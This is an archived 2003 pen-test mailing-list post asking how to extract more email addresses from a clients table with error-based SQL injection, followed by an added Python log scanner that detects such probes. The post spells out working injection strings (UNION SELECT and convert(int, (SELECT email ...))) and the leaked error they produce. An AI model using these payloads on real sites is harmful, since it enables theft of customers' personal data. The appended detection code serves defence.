SQL injection - get more values
From: Daniel Savi (dss@brturbo.com)
Date: 02/12/03
Date: 12 Feb 2003 17:48:41 -0000
From: Daniel Savi <dss@brturbo.com>
To: pen-test@securityfocus.com
Hi :)
I'm trying to get some info from the clients table and email field...
I tried this param in gubpage.asp?=...
') union select sum(email) from clients--
and got an error about all queries needed... so I tried to solve it with
') union select sum(email),1,1,1.... from clients--
until I got: operand type clash: text is incompatible with int
I found this answer in this forum (thanks :)), it was:
' %2b convert(int, (SELECT email FROM clients WHERE email > 'a')) %2b '
I got this:
Syntax error converting the varchar value 'anon@isp.com' to a column of data type int
Now, my problem: how can I get other e-mails from the table knowing one valid value?
I tried this
' %2b convert(int, (SELECT email FROM clients WHERE email > 'anon@isp.com')) %2b '
but no success
I think I can use NOT IN, but I'm not sure how to use it with convert...
Any tips are welcome!
Thanks
----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/
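
For defenders reading this thread: the message shows two things that can be looked for in web logs, a request parameter carrying "union select" or a convert(int, (SELECT ...)) wrapper, and a response that echoes a SQL Server conversion or type-clash error. The following is an added example, not part of the original post and not code from the list; the path /page.asp, the parameter name id, the sample values and all function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request side: a type conversion wrapped around a subquery, and UNION SELECT.
REQUEST_PATTERNS = {
    "convert-subquery": re.compile(r"\b(?:convert|cast)\s*\(.{0,40}?\(\s*select\b", re.I | re.S),
    "union-select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
}
# Response side: database errors that echo data or column types to the client.
RESPONSE_PATTERNS = {
    "conversion-error-leak": re.compile(r"Syntax error converting the \w+ value '[^']*'", re.I),
    "type-clash": re.compile(r"operand type clash", re.I),
}

def scan_request(url):
    """Return sorted labels of request patterns found in any decoded query value."""
    hits = set()
    # parse_qsl percent-decodes values, so %2b and %20 are normalised before matching.
    for _name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        for label, rx in REQUEST_PATTERNS.items():
            if rx.search(value):
                hits.add(label)
    return sorted(hits)

def scan_response(body):
    """Return sorted labels of leaked database errors found in a response body."""
    return sorted(label for label, rx in RESPONSE_PATTERNS.items() if rx.search(body))

def triage(url, body):
    """Combine both views: a probe that also produced a leaked error ranks highest."""
    req, resp = scan_request(url), scan_response(body)
    if req and resp:
        severity = "high"
    elif req or resp:
        severity = "medium"
    else:
        severity = "none"
    return {"severity": severity, "request": req, "response": resp}

# Constructed samples (not taken from any real log).
SAMPLE_URL = "/page.asp?id=%27%20%2b%20convert(int,%20(SELECT%20email%20FROM%20clients))%20%2b%20%27"
SAMPLE_BODY = "Syntax error converting the varchar value 'user@example.test' to a column of data type int."

if __name__ == "__main__":
    print(triage(SAMPLE_URL, SAMPLE_BODY))
```

A "high" result means the application both accepted the probe and returned the raw database error, which points at string-built SQL and verbose error pages; parameterised queries and generic error responses remove both signals.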